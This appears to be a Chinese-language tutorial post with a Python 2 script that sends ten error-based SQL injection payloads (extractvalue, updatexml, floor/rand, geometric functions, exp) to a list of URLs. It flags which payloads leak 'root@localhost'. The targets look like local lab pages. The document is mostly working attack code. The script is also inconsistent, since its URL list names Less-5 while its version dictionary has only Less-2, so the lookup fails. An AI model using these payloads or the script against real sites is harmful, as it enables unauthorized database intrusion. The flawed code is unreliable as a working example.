使用脚本批量去判断每个网站使用的数据库能使用的报错注入函数

在这里将每个网址和他对应的数据库用字典连接起来,方便输出时查看函数。

1
banben = {"http://localhost/test/showNews/lib/xinwenmoreandpinglun.php?action=123'":"版本为mysql8.0","http://192.168.100.197/Less-2/?id=1":"版本为mysql5.0","http://192.168.100.144/index.php?author=admin'":"版本为mariadb 5.5"}

将常见的报错注入函数放入列表中方便遍历

1
2
3
4
5
6
7
8
9
10
11
12
li = [
    "and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)",
    "and (extractvalue(1,concat(0x7e,(select user()),0x7e)))",
    "and (updatexml(1,concat(0x7e,(select user()),0x7e),1))",
    "and geometrycollection((select * from(select * from(select user())a)b))",
    "and multipoint((select * from(select * from(select user())a)b))",
    "and polygon((select * from(select * from(select user())a)b))",
    "and multipolygon((select * from(select * from(select user())a)b))",
    "and linestring((select * from(select * from(select user())a)b))",
    "and multilinestring((select * from(select * from(select user())a)b))",
    "and exp(~(select * from(select user())a))"
    ]

使用root作为关键字判断网页是否有回显,如果有回显证明此报错注入函数有用。

1
root@localhost

总体代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
# coding=UTF-8
import requests
import re
import base64

import sys
reload(sys)
sys.setdefaultencoding( "utf-8" )

lists = [
    "http://localhost/test/showNews/lib/xinwenmoreandpinglun.php?action=123'",
    "http://192.168.100.197/Less-5/?id=1",
    "http://192.168.100.144/index.php?author=admin'"
         ]
banben = {"http://localhost/test/showNews/lib/xinwenmoreandpinglun.php?action=123'":"版本为mysql8.0","http://192.168.100.197/Less-2/?id=1":"版本为mysql5.0","http://192.168.100.144/index.php?author=admin'":"版本为mariadb 5.5"}

print banben["http://localhost/test/showNews/lib/xinwenmoreandpinglun.php?action=123'"]

li = [
    "and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)",
    "and (extractvalue(1,concat(0x7e,(select user()),0x7e)))",
    "and (updatexml(1,concat(0x7e,(select user()),0x7e),1))",
    "and geometrycollection((select * from(select * from(select user())a)b))",
    "and multipoint((select * from(select * from(select user())a)b))",
    "and polygon((select * from(select * from(select user())a)b))",
    "and multipolygon((select * from(select * from(select user())a)b))",
    "and linestring((select * from(select * from(select user())a)b))",
    "and multilinestring((select * from(select * from(select user())a)b))",
    "and exp(~(select * from(select user())a))"
    ]

for i in range(len(lists)):
    url = lists[i]
    print "这时候测试的是{}".format(banben[url])
    for j in range(len(li)):
        yuju = lists[i]+ " " + format(li[j]) + " -- |"
        shuju = requests.get(yuju)
        r = r'root@localhost'
        jieguo  = re.search(r,shuju.text)

        if jieguo :

            print li[j]